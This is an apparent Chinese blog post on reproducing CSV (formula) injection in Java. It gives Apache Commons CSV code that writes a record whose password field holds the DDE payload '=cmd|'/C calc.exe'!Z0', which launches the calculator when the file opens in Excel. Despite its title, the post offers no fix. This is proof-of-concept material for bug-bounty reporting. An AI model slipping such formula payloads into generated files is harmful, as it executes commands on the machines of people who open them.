csv注入java怎么解决_csv注入复现代码

以下代码生成的csv文件,使用Microsoft Execl能成功弹出计算器,虽然打开时有安全提示,但是大多数src还是会接收该类漏洞

--------------------------------------------------------------------------------------------

package jinqi;

public class User {

private String username;

private String password;

private int age;

private String name;

public String getUsername() {

return username;

}

public void setUsername(String username) {

this.username = username;

}

public int getAge() {

return age;

}

public void setAge(int age) {

this.age = age;

}

public String getName() {

return name;

}

public void setName(String name) {

this.name = name;

}

public String getPassword() {

return password;

}

public void setPassword(String password) {

this.password = password;

}

public User(String username, String password, String name, int age) {

super();

this.username = username;

this.password = password;

this.age = age;

this.name = name;

}

}

--------------------------------------------------------------------------------

package jinqi;

import java.io.FileWriter;

import java.io.IOException;

import java.util.ArrayList;

import java.util.List;

import org.apache.commons.csv.CSVFormat;

import org.apache.commons.csv.CSVPrinter;

public class Test {

private static final String NEW_LINE_SEPARATOR = "\n";

//CSV文件头

private static final Object [] FILE_HEADER = {"用户名","密码","名称","年龄"};

/**

* 写CSV文件

*

* @param fileName

*/

public static void writeCsvFile(String fileName) {

FileWriter fileWriter = null;

CSVPrinter csvFilePrinter = null;

//创建 CSVFormat

CSVFormat csvFileFormat = CSVFormat.DEFAULT.withRecordSeparator(NEW_LINE_SEPARATOR);

try {

//初始化FileWriter

fileWriter = new FileWriter(fileName);

//初始化 CSVPrinter

csvFilePrinter = new CSVPrinter(fileWriter, csvFileFormat);

//创建CSV文件头

csvFilePrinter.printRecord(FILE_HEADER);

// 用户对象放入List

List userList = new ArrayList ();

userList.add(new User("zhangsan", "=2+7", "张三", 25));

userList.add(new User("lisi", "=cmd|'/C calc.exe'!Z0", "李四", 23));

userList.add(new User("wangwu", "456", "王五", 24));

userList.add(new User("zhaoliu", "zhaoliu", "赵六", 20));

// 遍历List写入CSV

for (User user : userList) {

List userDataRecord = new ArrayList();

userDataRecord.add(user.getUsername());

userDataRecord.add(user.getPassword());

userDataRecord.add(user.getName());

userDataRecord.add(String.valueOf(user.getAge()));

csvFilePrinter.printRecord(userDataRecord);

}

System.out.println("CSV文件创建成功~~~");

} catch (Exception e) {

e.printStackTrace();

} finally {

try {

fileWriter.flush();

fileWriter.close();

csvFilePrinter.close();

} catch (IOException e) {

e.printStackTrace();

}

}

}

/**

* @param args

*/

public static void main(String[] args){

writeCsvFile("G:\\jinqi.csv");

}

}

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值